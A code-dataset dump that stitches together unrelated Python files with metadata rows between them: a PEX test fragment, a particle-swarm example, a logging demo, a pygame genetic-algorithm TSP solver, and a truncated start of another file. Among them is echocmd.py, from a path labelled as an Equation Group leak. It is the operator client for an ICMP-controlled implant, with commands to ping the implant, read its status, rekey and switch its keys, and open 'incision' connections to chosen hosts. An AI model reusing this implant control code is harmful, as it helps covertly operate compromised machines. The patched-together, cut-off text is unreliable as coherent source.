build_and_check(td3, True)
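# Illustrative sketch (not part of the test suite): the smallest PEXBuilder
# round trip exercised by the tests above -- set an entry point, build the
# .pex, and wrap it in a PEX object.  The paths are assumptions for the example.
def _build_minimal_pex(exe_source_path, target_pex_path):
  pb = PEXBuilder()
  pb.set_executable(exe_source_path, 'exe.py')   # entry point, as in the tests
  pb.build(target_pex_path)                      # writes the runnable archive
  return PEX(target_pex_path)                    # .run() executes it, as above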
| apache-2.0 | -7,104,494,122,520,016,000 | 29.491713 | 90 | 0.64595 | false | 3.091877 | true | false | false |
avanwyk/cipy | examples/pso_optimizer.py | 1 | 1205 | # Copyright 2016 Andrich van Wyk
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cipy.algorithms.core import max_iterations
from cipy.benchmarks.functions import sphere
from cipy.optimizers.pso_optimizer import PSOOptimizer
def main(dimension, iterations):
""" Main function for PSO optimizer example.
    Instantiate PSOOptimizer to minimize the sphere function in the given dimension
    (30-dimensional in this example).
"""
optimizer = PSOOptimizer()
solution = optimizer.minimize(sphere, -5.12, 5.12, dimension,
max_iterations(iterations))
return solution, optimizer
if __name__ == "__main__":
solution, optimizer = main(30, 1000)
print(solution)
print(optimizer.accuracy())
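# Illustrative sketch (not part of the original example): the same optimizer API
# accepts any callable objective.  The shifted objective, bounds and iteration
# budget below are assumptions chosen only to show the call shape.
def shifted_sphere_example(dimension=10, iterations=500):
    objective = lambda x: sphere([xi - 1.0 for xi in x])   # assumes a list-like solution
    optimizer = PSOOptimizer()
    solution = optimizer.minimize(objective, -5.12, 5.12, dimension,
                                  max_iterations(iterations))
    return solution, optimizer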
| apache-2.0 | 5,783,334,716,175,215,000 | 34.441176 | 75 | 0.728631 | false | 4.198606 | false | false | false |
DarthMaulware/EquationGroupLeaks | Leak #4 - Don't Forget Your Base/EQGRP-Auction-File/Linux/bin/pyside/echocmd.py | 1 | 23387 | import base
import icmpecho
import tcpstream
import crypto
import time
import struct
import string
import re
import sha
import hex
class ECHOCMD(base.Command):
def __init__(self):
base.Command.__init__(self)
self.op = 0
self.res = 0
self.auth_1 = 0xFFFFFF00L
self.data = ""
def run(self):
if self.implant.protocol.sock != None:
return None
else:
return "Not connected. Try: %s help connect" % (self.implant.session.name)
#------------------------------------------------------------------------
# Name : Assemble
# Purpose: Form a packet to be sent to the implant
# Receive: << nothing >>
# Return : << nothing >>
#------------------------------------------------------------------------
def Assemble(self):
# Find the current time
currTime = time.time();
curr_time_sec = int(currTime)
# Pack the data structure
self.cmddata = struct.pack("!HH", 0, self.op)
self.cmddata = self.cmddata + struct.pack("!L",curr_time_sec + \
self.implant.timediff)
self.cmddata = self.cmddata + self.data
# Add extra chars at the end to fill packet to correct size
for i in range(self.implant.packetSize - len(self.cmddata) - 28):
self.cmddata = self.cmddata + '\000'
# Add some padding for RC6
if self.implant.cipher.num == 2:
self.cmddata = '\000\000\000\000\000\000\000\000' + self.cmddata
#------------------------------------------------------------------------
# Name : Disassemble
# Purpose: Process a packet received from the implant
# Receive: data - The raw packet data
# Return : << nothing >>
#------------------------------------------------------------------------
def Disassemble(self,data):
# Remove the padding for RC6
if self.implant.cipher.num == 2:
data = data[8:]
self.op = struct.unpack("!H",data[2:4])[0]
self.res = struct.unpack("!H",data[0:2])[0]
# Check for ALIVE bit in the return
if (self.res & 0x8000L):
self.res = self.res & 0x7fL
else:
print "Alive bit not set in return packet"
self.ts = struct.unpack("!L",data[4:8])[0]
self.data = data[8:]
#------------------------------------------------------------------------
# Name : Query
    # Purpose: Encrypt and send a query to an implant, then decrypt the response
# Receive: << nothing >>
# Return : << nothing >>
#------------------------------------------------------------------------
def Query(self):
""" Will return result """
self.Assemble()
# Setup the protocol
self.protocol = self.implant.protocol
self.protocol.SetDestination(self.implant.session.target.ip)
# for i=0 to max_retries
for i in range(2):
try:
# Send the packet
self.protocol.SendTo(self.cmddata)
# Get the response
myData = self.protocol.RecvFrom()
if( myData != None and myData != ""):
self.Disassemble(myData)
break
except:
print "Retrying"
continue
#------------------------------------------------------------------------
# Name : ConvertIP
    # Purpose: Convert an IP address to packed network-byte-order form
# Receive: ip - The ip address to convert
# Return : the IP address in network byte order
#------------------------------------------------------------------------
def ConvertIP(self,ip):
#regLine = regex.compile('^\([\\][0-3]?[0-7]?[0-7]\)*$')
#regS = regex.compile('\([\\][0-3]?[0-7]?[0-7]\)')
if( type(ip) == type('') ):
#if regLine.match(ip) == 0:
# pos = 0
# ipStr = ''
# while pos < len(ip):
# Cs = regS.search(ip,pos)
# Cl = regS.match(ip,pos)
# pos = Cs+Cl
# ipStr = ipStr + eval("'"+ip[Cs:pos]+"'")
#else:
ipParts = string.splitfields(ip,'.')
if len(ipParts) == 4:
ipStr = chr(eval(ipParts[0]))
ipStr = ipStr+chr(eval(ipParts[1]))
ipStr = ipStr+chr(eval(ipParts[2]))
ipStr = ipStr+chr(eval(ipParts[3]))
else:
#ipStr = ip
raise ValueError, ip
else:
ipStr = struct.pack("!L",ip)
return ipStr
def ConvertToDot(self, ip):
if type(ip) == type('a'):
ip = struct.unpack("!L",ip)[0]
return "%d.%d.%d.%d" % ((int)(ip / 16777216) & 0xFFL,\
(int)(ip / 65536) & 0xFFL,\
(int)(ip / 256) & 0xFFL,\
ip & 0xFFL)
def ConvertTime(self, time):
if type(time) == type(3600):
return time
#x = regex.compile("^\([-]\)?\(\([0-9]*\)D\)?\(\([0-9]*\)H\)?\(\([0-9]*\)M\)?\(\([0-9]*\)[S]?\)?$")
regep = re.compile("^([+-]?)(([0-9]+)D)?(([0-9]+)H)?(([0-9]+)M)?(([0-9]+)S?)?$")
x = regep.match(string.upper(time))
if x:
times = [x.group(3), x.group(5), x.group(7), x.group(9)]
for i in range(4):
if times[i] == None or times[i] == "":
times[i] = "0"
time = eval(times[0]) * 86400 + eval(times[1]) * 3600 \
+ eval(times[2]) * 60 + eval(times[3])
if x.group(1) == "-":
time = time * -1
return time
raise ValueError, time
def TimeConvert(self,time):
if type(time) == type("1h"):
return time
if time < 1:
fmtString = "-"
time = time * -1
else:
fmtString = ""
sec = time % 60
time = time - sec
min = time % 3600
time = time - min
min = min/60
hour = time % 86400
time = time - hour
hour = hour / 3600
day = time / 86400
if day:
fmtString = fmtString + "%dd" %(day)
if hour:
fmtString = fmtString + "%dh" %(hour)
if min:
fmtString = fmtString + "%dm" %(min)
if sec:
fmtString = fmtString + "%ds" % (sec)
return fmtString
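# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the implant protocol code): ConvertTime and
# TimeConvert above map between "1d2h3m4s"-style strings and signed seconds.
# A standalone round trip using the same regular-expression idea; the helper
# name is an assumption for the example.
def _duration_to_seconds(text):
    match = re.match(r"^([+-]?)(?:([0-9]+)D)?(?:([0-9]+)H)?(?:([0-9]+)M)?(?:([0-9]+)S?)?$",
                     string.upper(text))
    if match is None:
        raise ValueError(text)
    days, hours, minutes, seconds = [int(part or 0) for part in match.groups()[1:]]
    total = days * 86400 + hours * 3600 + minutes * 60 + seconds
    return -total if match.group(1) == "-" else total
# _duration_to_seconds("1d2h3m4s") should give 93784, matching ECHOCMD().ConvertTime("1d2h3m4s")
# ---------------------------------------------------------------------------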
##########################################################################
# PING class
# op code: 0x00
#########################################################################
class ECHOCMD_PING(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "ping"
self.usage = "ping"
self.info = "Send an are-you-there ping to the target"
self.op = 0x00L
def run(self):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.Query()
if self.op == 0x0L and self.res == 0x01L:
# Set the timediff
self.implant.timediff = self.ts - time.time()
return (1,"implant is alive, setting timediff to %s" %\
(self.TimeConvert(self.implant.timediff)))
else:
return (0,"implant is NOT alive")
##########################################################################
# STATUS class
# op code: 0x01
#########################################################################
class ECHOCMD_STATUS(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "status"
self.usage = "status"
self.info = "Find version of the implant, number of fd in use etc.."
self.op = 0x01L
def run(self):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.Query()
if self.op == 0x01L and self.res == 0x01L:
ver = struct.unpack("!H",'\000'+self.data[:1])[0]
unused = struct.unpack("!H",'\000'+self.data[1:2])[0]
fd = struct.unpack("!H",self.data[2:4])[0]
boot_sec = struct.unpack("!L",self.data[4:8])[0]
dns,redir,conn = struct.unpack("!LLL",self.data[8:20])
res = "Remote version: %d\n" % ver
res = res + "Time host was last rebooted: %s\n" % \
time.ctime(time.time()-boot_sec + self.implant.timediff)
res = res + "%d Active DNS rules\n" %(dns)
res = res + "%d Active redirect rules\n" %(redir)
res = res + "%d Active connections" %(conn)
return (1,res)
else:
return (0,"Status operation failed")
##########################################################################
# INCISION class
# op code: 0x14
##########################################################################
class ECHOCMD_INCISION(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "incision"
self.usage = "incision <ip>:<port>"
self.info = "Start an incision connection to the specified ip and port"
self.op = 0x14L
def parseHostInfo(self,host):
#split the ip from the ports
res = string.split(host,":")
if len(res) == 1:
raise ValueError, host
elif len(res) == 2:
ports = string.split(res[1],"/")
if len(ports) < 1 or len(ports) > 2:
raise ValueError, ports
if ports[0] == "*":
raise ValueError, ports[0]
else:
ports[0] = eval(ports[0])
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,ports[0]
else:
raise ValueError, host
def run(self,ipport):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
host,ip,port = self.parseHostInfo(ipport)
if host != None:
hpn = host.implant.parent.name
myname = host.name
cmd = host.GetCommand('rediradd')
res = cmd.run("tcp",\
"%s:%d/%d"%(hpn,port,0),\
"%s:%d/%d"%(self.implant.session.target.ip,0,port),\
"-afix")
if cmd.implant.session.target.hasAnotherAddress == 1:
ip = cmd.redir.ST_ip
# Change the ip to a decimal number
self.data = ip + struct.pack("!L",port)
self.Query()
# Look at the response
if (self.op == 0x14L and self.res == 0x1L):
return (1,"Incision contacted successfully")
else:
if( struct.unpack("!L",self.data[0:4])[0] == 0x0106 ):
return (0,"Incision command not supported")
elif( struct.unpack("!L", self.data[0:4])[0] == 0x0107 ):
return (0,"Incision not installed")
else:
return (0,"Incision command failed")
##########################################################################
# DONE class
# op code: 0xFF
##########################################################################
class ECHOCMD_DONE(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "done"
self.usage = "done [<num> | all]"
self.info = "Send a DONE message to reset the connection"
self.op = 0xFFL
def run(self,all=None):
msg = ECHOCMD.run(self)
if self.implant.protocol.sock == None:
base.sessionDict[self.implant.session.name] = None
return (1,"all done with " + self.implant.session.name)
rules = self.implant.rules
while len(rules):
i = len(self.implant.rules) - 1
rules[i].remove()
if all != None:
if type(all) != type(1):
all = string.upper(all)
if all[0:1] == "A":
all = 0
else:
all = 0xFFFFFFFFL
else:
all = 0xFFFFFFFFL
self.data = struct.pack("!L",all)
self.Query()
if self.op == 0xFFL and self.res == 0x01L:
myNum = struct.unpack("!L",self.data[0:4])[0]
else:
myNum = 0
if all == 0 or all == myNum or all == 0xFFFFFFFFL:
self.implant.protocol.sock.close()
self.implant.protocol.sock = None
base.sessionDict[self.implant.session.name] = None
if self.implant.version >= 2.0:
if self.implant.session.localRedir != None:
self.implant.session.localRedir.remove()
if myNum == 0:
return (0,"DONE command failed")
return (1,"DONE command completed successfully")
##########################################################################
# SWITCHKEY class
# op code: 0x16
##########################################################################
class ECHOCMD_SWITCHKEY(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "switchkey"
self.usage = "switchkey"
self.info = "Tells the implant to switch keys"
self.op = 0x16L
def run(self):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
newCV = self.implant.newCV
self.Query()
if self.op == 0x16L and self.res == 0x01L:
# Change keys
if newCV != None:
self.implant.cipher.SetKey((struct.unpack("!L",newCV[0:4])[0],\
struct.unpack("!L",newCV[4:8])[0],\
struct.unpack("!L",newCV[8:12])[0],
struct.unpack("!L",newCV[12:16])[0]))
self.implant.newCV = None
else:
self.implant.cipher.SetKey(self.implant.targetopts['KEY'])
key = self.implant.cipher.GetKey()
# Check for RC6
if self.implant.cipher.num == 2:
return (1,"SWITCHKEY command completed successfully\nCurrent key is: %s %s %s %s" % (hex.str(key[0]),hex.str(key[1]),hex.str(key[2]),hex.str(key[3])))
else:
return (1,"SWITCHKEY command completed successfully\nCurrent key is: %s %s %s" % (hex.str(key[0]),hex.str(key[1]),hex.str(key[2])))
else:
return (0,"SWITCHKEY command not received")
##########################################################################
# REKEY class
# op code: 0x17
##########################################################################
class ECHOCMD_REKEY(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "rekey"
self.usage = "rekey"
self.info = "Initiates a new session key exchange with the implant"
self.op = 0x17L
def run(self):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
myRand = ''
N = self.implant.N
d = self.implant.d
Nsign = self.implant.Nsign
dsign = self.implant.dsign
highofN = N >> 992
# Get the random data
for i in range(4):
myRand = myRand + crypto.GetRandom()
myRand = myRand[0:108]
# Make sure the data isn't going to be bigger than N
highofRand = struct.unpack("!L",myRand[104:108])[0]
if highofRand >= highofN:
myRand = myRand[0:104] + struct.pack("!L",highofRand - highofN)
# Compute a hash of the random data
myHash = sha.new(myRand)
myHash = myHash.digest()
#print "hash s:" + \
# " " + hex.str(struct.unpack("!L",myHash[0:4])[0]) +\
# " " + hex.str(struct.unpack("!L",myHash[4:8])[0]) +\
# " " + hex.str(struct.unpack("!L",myHash[8:12])[0]) +\
# " " + hex.str(struct.unpack("!L",myHash[12:16])[0]) +\
# " " + hex.str(struct.unpack("!L",myHash[16:20])[0])
# Convert the hash and data into a MP number
keyData = myHash + myRand
num = 0L
for i in range(32):
num = (num << 32) | struct.unpack("!L",keyData[124-i*4:128-i*4])[0]
#print "orig (switched) =", hex.str(num)
# RSA
ct = pow(num,dsign,Nsign)
# Package the new MP number
ct2 = 0L
for i in range(32):
ct2 = ct2 << 32 | (ct >> 32*i) & 0xffffffffL
#print "CT =",hex.str(ct)
#print "CT (switched) =",hex.str(ct2)
self.data = ''
for i in range(32):
self.data = struct.pack("!L", ((ct2>>i*32) & 0xffffffffL)) + self.data
self.data = '\000\000\000\000' + self.data
# Send it
self.Query()
self.ret = struct.unpack("!L",self.data[0:4])[0]
if self.op == 0x17L and self.res == 0x01L:
self.data = self.data[4:]
# Unwrap the number
num = 0L
for i in range(32):
num = (num << 32) + \
struct.unpack("!L",self.data[124-i*4:128-i*4])[0]
# RSA
pt = pow(num,d,N)
# Convert the number into the random bits
for i in range(32):
keyData = keyData + \
struct.pack("!L",((pt >> 32*i)&0xffffffffL))
#out = ''
#for i in range(len(keyData)):
# out = out + "%02x" % \
# ((struct.unpack("!H", '\000' + keyData[i:i+1])[0]) &\
# 0xff)
#print "Raw output =",out
# Form CV
newCV = sha.new(keyData)
self.implant.newCV = newCV.digest()
#out = ''
#for i in range(len(self.implant.newCV)):
# out = out + "%02x" % \
# ((struct.unpack("!H", '\000' + self.implant.newCV[i:i+1])[0]) &\
# 0xff)
#print "CV output =",out
return (1,"REKEY command completed successfully, now run switchkey")
elif self.ret == 108:
return (0, "Incorrect authentication")
elif self.ret == 109:
return (0, "Implant not currently on master (original) key")
else:
return (0,"REKEY command failed")
##########################################################################
# ORIGKEY class
##########################################################################
class ECHOCMD_ORIGKEY(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "origkey"
self.usage = "origkey"
self.info = "Sets the session key back to the original key"
def run(self):
msg = ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.implant.cipher.SetKey(self.implant.targetopts['KEY'])
return (1,"ORIGKEY command completed successfully")
##########################################################################
# KEY class
##########################################################################
class ECHOCMD_KEY(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "key"
self.usage = "key [cv1 cv2 cv3 [cv4]]"
self.info = "Display or set the current key"
def run(self,cv1=0, cv2=0, cv3=0, cv4=0):
msg = ECHOCMD.run(self)
#if msg != None:
# return (0,msg)
if cv1 == 0 and cv2 == 0 and cv3 == 0:
key = self.implant.cipher.GetKey()
else:
key = (cv1,cv2,cv3,cv4)
self.implant.cipher.SetKey(key)
# Display another variable if we're using RC6
if self.implant.cipher.num == 2:
return (1,"Current key is: %s %s %s %s" % \
(hex.str(key[0]), hex.str(key[1]), hex.str(key[2]),
hex.str(key[3])))
else:
return (1,"Current key is: %s %s %s" % \
(hex.str(key[0]), hex.str(key[1]), hex.str(key[2])))
##########################################################################
# RETRY class
#########################################################################
class ECHOCMD_RETRY(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "retries"
self.usage = "retries [num]"
self.info = "Get and set the number of retries (see also timeout)"
def run(self, num=-1):
msg = ECHOCMD.run(self)
#if msg != None:
# return (0,msg)
if num > -1:
self.implant.retries = num
return (1,"Set to %d retries" % num)
else:
return (1,"Will try %d times before giving up" % self.implant.retries)
##########################################################################
# SETSIZE class
#########################################################################
class ECHOCMD_SETSIZE(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "setsize"
self.usage = "setsize [CC packet size]"
self.info = "Get and set the size of the ICMP packet"
def run(self, size=0):
msg = ECHOCMD.run(self)
#if msg != None:
# return (0,msg)
if size:
self.implant.packetSize = size
return (1,"ICMP packet size is now %d" % size)
else:
return (1,"ICMP packet size is %d" % self.implant.packetSize)
##########################################################################
# TIMEOUT class
#########################################################################
class ECHOCMD_TIMEOUT(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "timeout"
self.usage = "timeout [seconds]"
self.info = "Get and set the timeout (in seconds) to wait for a response"
def run(self,sec=0):
msg = ECHOCMD.run(self)
#if msg != None:
# return (0,msg)
if sec:
self.implant.protocol.timeout = sec
return (1,"Timeout set to %d seconds" % sec)
else:
return (1,"The timeout is set to %d seconds" % self.implant.protocol.timeout)
##########################################################################
# TIMEDIFF class
#########################################################################
class ECHOCMD_TIMEDIFF(ECHOCMD):
def __init__(self):
ECHOCMD.__init__(self)
self.name = "timediff"
self.usage = "timediff [[-]seconds]"
self.info = "Get and set time difference (in seconds) between host and target"
def run(self,sec=-999999):
msg = ECHOCMD.run(self)
#if msg != None:
# return (0,msg)
if sec != -999999:
self.implant.timediff = self.ConvertTime(sec)
return (1,"Timediff set to %s" % self.TimeConvert(sec))
else:
return (1,"Timediff is set at %s" % self.TimeConvert(self.implant.timediff))
| unlicense | -3,864,204,355,794,672,000 | 35.035439 | 166 | 0.44157 | false | 3.902386 | false | false | false |
qilicun/python | python2/PyMOTW-1.132/PyMOTW/logging/logging_level_example.py | 1 | 1796 | #!/usr/bin/env python
#
# Copyright 2007 Doug Hellmann.
#
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Doug
# Hellmann not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# DOUG HELLMANN DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL DOUG HELLMANN BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
"""Simple logging to stderr using different levels.
See http://blog.doughellmann.com/2007/05/pymotw-logging.html
"""
__module_id__ = "$Id$"
#end_pymotw_header
import logging
import sys
LEVELS = { 'debug':logging.DEBUG,
'info':logging.INFO,
'warning':logging.WARNING,
'error':logging.ERROR,
'critical':logging.CRITICAL,
}
if len(sys.argv) > 1:
level_name = sys.argv[1]
level = LEVELS.get(level_name, logging.NOTSET)
logging.basicConfig(level=level)
logging.debug('This is a debug message')
logging.info('This is an info message')
logging.warning('This is a warning message')
logging.error('This is an error message')
logging.critical('This is a critical error message')
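# Example invocations (assuming this file is saved as logging_level_example.py):
#
#   $ python logging_level_example.py debug      # all five messages are printed
#   $ python logging_level_example.py error      # only the error and critical messages
#   $ python logging_level_example.py            # no argument: basicConfig() is never
#                                                # called here, so the root logger's
#                                                # default WARNING level applies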
| gpl-3.0 | 8,593,154,985,870,459,000 | 32.259259 | 70 | 0.727728 | false | 3.862366 | false | false | false |
crazyskady/ai-game-python | Chapter04/TSP.py | 1 | 7689 | # -*- coding: utf-8 -*-
import random
import math
import copy
import pygame
from pygame.locals import *
from sys import exit
EPSILON = 0.000001
NUM_BEST_TO_ADD = 2
class CoOrd(object):
def __init__(self, a, b):
self._x = a
self._y = b
def X(self):
return self._x
def Y(self):
return self._y
class mapTSP(object):
    # mapWidth, mapHeight: size of the canvas on which the cities are placed
def __init__(self, mapWidth, mapHeight, numCities):
self._mapWidth = mapWidth
self._mapHeight = mapHeight
self._numCities = numCities
self._BestPossibleRoute = 0
self._CityCoOrds = []
self.CreateCitiesCircular()
self.CalculateBestPossibleRoute()
return
def CreateCitiesCircular(self):
margin = 40 #if you have GUI, this parameter should be set
radius = 0
if self._mapHeight < self._mapWidth:
radius = (self._mapHeight/2) - margin
else:
radius = (self._mapWidth/2) - margin
origin = CoOrd(self._mapWidth/2, self._mapHeight/2)
segmentSize = 2 * math.pi / self._numCities
angle = 0
while angle < (2 * math.pi):
thisCity = CoOrd((radius*math.sin(angle) + origin.X()), (radius * math.cos(angle) + origin.Y()))
self._CityCoOrds.append(thisCity)
angle += segmentSize
return
def CalculateA_to_B(self, city1, city2):
#print city1, city2
xDist = city1.X() - city2.X()
yDist = city1.Y() - city2.Y()
return math.sqrt(xDist*xDist + yDist*yDist)
def CalculateBestPossibleRoute(self):
#print "Enter CalculateBestPossibleRoute"
self._BestPossibleRoute = 0
for idx, city in enumerate(self._CityCoOrds[:-1]):
self._BestPossibleRoute += self.CalculateA_to_B(city, self._CityCoOrds[idx+1])
self._BestPossibleRoute += EPSILON
self._BestPossibleRoute += self.CalculateA_to_B(self._CityCoOrds[-1], self._CityCoOrds[0])
return
def BestPossibleRoute(self):
return self._BestPossibleRoute
def GetTourLength(self, route):
#print "Enter GetTourLength", route
TotalDistance = 0
for idx, city in enumerate(route[:-1]):
TotalDistance += self.CalculateA_to_B(self._CityCoOrds[city], self._CityCoOrds[route[idx+1]])
TotalDistance += self.CalculateA_to_B(self._CityCoOrds[route[-1]], self._CityCoOrds[route[0]])
return TotalDistance
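# Illustrative check (not part of the original module): because the cities are
# placed on a circle, visiting them in index order is already an optimal tour,
# which is exactly the stopping test used by the GA below.
def _identity_tour_is_optimal(width=500, height=500, num_cities=20):
    world = mapTSP(width, height, num_cities)
    identity_tour = range(num_cities)              # Python 2: a plain list of indices
    return world.GetTourLength(identity_tour) <= world.BestPossibleRoute()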
class SGenome(object):
def __init__(self, nc):
self._Fitness = 0
self._Cities = self.GrabPermutation(nc)
return
def GrabPermutation(self, limit):
Perm = []
for i in xrange(limit):
NextPossibleNumber = random.randint(0, limit-1)
while NextPossibleNumber in Perm:
NextPossibleNumber = random.randint(0, limit-1)
Perm.append(NextPossibleNumber)
return Perm
def Show(self):
print self._Cities
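# Illustrative note (not part of the original class): GrabPermutation builds a
# random tour by rejection sampling, which costs O(n^2) for n cities.  Shuffling
# the index list gives an equivalent random permutation in O(n); the helper
# below is only a sketch and reuses the module-level random import.
def _random_tour(num_cities):
    tour = range(num_cities)
    random.shuffle(tour)
    return tour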
class gaTSP(object):
def __init__(self, mutRate, crossRate, popSize, numCities, mapWidth, mapHeight):
self._MutationRate = mutRate
self._CrossoverRate = crossRate
self._PopSize = popSize
self._FittestGenome = 0
self._Generation = 0
self._ShortestRoute = 9999999999
self._LongestRoute = 0
self._ChromoLength = numCities
self._Busy = False
self._TotalFitness = 0.0
self._Population = []
self._Map = mapTSP(mapWidth, mapHeight, numCities)
self.CreateStartingPopulation()
return
def CreateStartingPopulation(self):
self._Population = []
for i in xrange(self._PopSize):
self._Population.append(SGenome(self._ChromoLength))
self._Generation = 0
self._ShortestRoute = 9999999999
self._FittestGenome = 0
self._Busy = False
return
def RouletteWhellSelection(self):
fSlice = random.random() * self._TotalFitness
cfTotal = 0.0
SelectedGenome = 0
for i in xrange(self._PopSize):
cfTotal += self._Population[i]._Fitness
if cfTotal > fSlice:
SelectedGenome = i
break
return self._Population[SelectedGenome]
def MutateEM(self, chromo):
if random.random() > self._MutationRate:
return chromo
pos1 = random.randint(0, len(chromo)-1)
pos2 = pos1
while pos1 == pos2:
pos2 = random.randint(0, len(chromo)-1)
chromo[pos1], chromo[pos2] = chromo[pos2], chromo[pos1]
return chromo
def CrossoverPMX(self, mum, dad):
if random.random() > self._CrossoverRate or mum == dad:
#if random.random() > self._CrossoverRate:
return mum, dad
baby1 = copy.deepcopy(mum)
baby2 = copy.deepcopy(dad)
beg = random.randint(0, len(mum)-2)
end = random.randint(beg+1, len(mum)-1)
for pos in range(beg, end+1):
gene1 = baby1[pos]
gene2 = baby2[pos]
            if gene1 != gene2: # every city index must appear exactly once
posGene1 = baby1.index(gene1)
posGene2 = baby1.index(gene2)
baby1[posGene1], baby1[posGene2] = baby1[posGene2], baby1[posGene1]
posGene1 = baby2.index(gene1)
posGene2 = baby2.index(gene2)
baby2[posGene1], baby2[posGene2] = baby2[posGene2], baby2[posGene1]
return baby1, baby2
def CalculatePopulationsFitness(self):
for i in xrange(self._PopSize):
TourLength = self._Map.GetTourLength(self._Population[i]._Cities)
self._Population[i]._Fitness = TourLength
if TourLength < self._ShortestRoute:
self._ShortestRoute = TourLength
self._FittestGenome = i
if TourLength > self._LongestRoute:
self._LongestRoute = TourLength
for i in xrange(self._PopSize):
self._Population[i]._Fitness = self._LongestRoute - self._Population[i]._Fitness
self._TotalFitness += self._Population[i]._Fitness
return
def Reset(self):
self._ShortestRoute = 9999999999
self._LongestRoute = 0
self._TotalFitness = 0
return
def Epoch(self):
self.Reset()
self.CalculatePopulationsFitness()
if self._ShortestRoute <= self._Map.BestPossibleRoute():
self._Busy = False
print "Generation: ", self._Generation, " Find Path: ", self._Population[self._FittestGenome]._Cities
return
NewPop = []
for i in xrange(NUM_BEST_TO_ADD):
NewPop.append(copy.deepcopy(self._Population[self._FittestGenome]))
while len(NewPop) < self._PopSize:
mum = self.RouletteWhellSelection()
dad = self.RouletteWhellSelection()
baby1 = SGenome(0)
baby2 = SGenome(0)
baby1._Cities, baby2._Cities = self.CrossoverPMX(mum._Cities, dad._Cities)
baby1._Cities = self.MutateEM(baby1._Cities)
baby2._Cities = self.MutateEM(baby2._Cities)
NewPop.append(baby1)
NewPop.append(baby2)
self._Population = NewPop
self._Generation += 1
return
def Run(self):
self.CreateStartingPopulation()
self._Busy = True
def Started(self):
return self._Busy
def Stop(self):
self._Busy = False
return
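# Illustrative sketch (not part of the original module): CrossoverPMX above keeps
# both children valid permutations by swapping conflicting genes.  A standalone
# run with a fixed crossover section (positions 1..2) makes the repair visible;
# the parent tours are arbitrary assumptions.
def _pmx_demo():
    mum = [0, 1, 2, 3, 4, 5]
    dad = [2, 3, 5, 0, 4, 1]
    baby1, baby2 = list(mum), list(dad)
    beg, end = 1, 2                               # fixed instead of random.randint
    for pos in range(beg, end + 1):
        gene1, gene2 = baby1[pos], baby2[pos]
        if gene1 != gene2:
            i, j = baby1.index(gene1), baby1.index(gene2)
            baby1[i], baby1[j] = baby1[j], baby1[i]
            i, j = baby2.index(gene1), baby2.index(gene2)
            baby2[i], baby2[j] = baby2[j], baby2[i]
    # baby1 now carries dad's genes in positions 1..2, baby2 carries mum's,
    # and both remain permutations of 0..5
    return baby1, baby2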
if __name__ == "__main__":
WINDOW_WIDTH = 500
WINDOW_HEIGHT = 500
NUM_CITIES = 20
CITY_SIZE = 5
MUTATION_RATE = 0.2
CROSSOVER_RATE = 0.75
POP_SIZE = 40
#Test Code(self, mutRate, crossRate, popSize, numCities, mapWidth, mapHeight):
test_gaTSP = gaTSP(MUTATION_RATE, CROSSOVER_RATE, POP_SIZE, NUM_CITIES, WINDOW_WIDTH, WINDOW_HEIGHT)
test_gaTSP.Run()
pygame.init()
screen = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT), 0, 32)
font = pygame.font.SysFont("arial", 16)
while True:
for event in pygame.event.get():
if event.type == QUIT:
exit()
screen.fill((255, 255, 255))
for idx, item in enumerate(test_gaTSP._Map._CityCoOrds):
pygame.draw.circle(screen,[255,0,0],[int(item._x), int(item._y)],5,0)
if test_gaTSP.Started():
test_gaTSP.Epoch()
drawPoints = []
for idx, item in enumerate(test_gaTSP._Population[test_gaTSP._FittestGenome]._Cities):
cityPos = test_gaTSP._Map._CityCoOrds[item]
drawPoints.append([int(cityPos._x), int(cityPos._y)])
pygame.draw.lines(screen, [0, 255, 0], True, drawPoints, 2)
generatioinStr = "Generation: " + str(test_gaTSP._Generation)
screen.blit(font.render(generatioinStr, True, (0, 0, 255)), (20, 20))
pygame.display.update()
| mit | -2,548,125,952,688,736,000 | 23.641935 | 104 | 0.685954 | false | 2.737012 | true | false | false |
irl/ten-second-balls | universe.py | 1 | 3157 | #
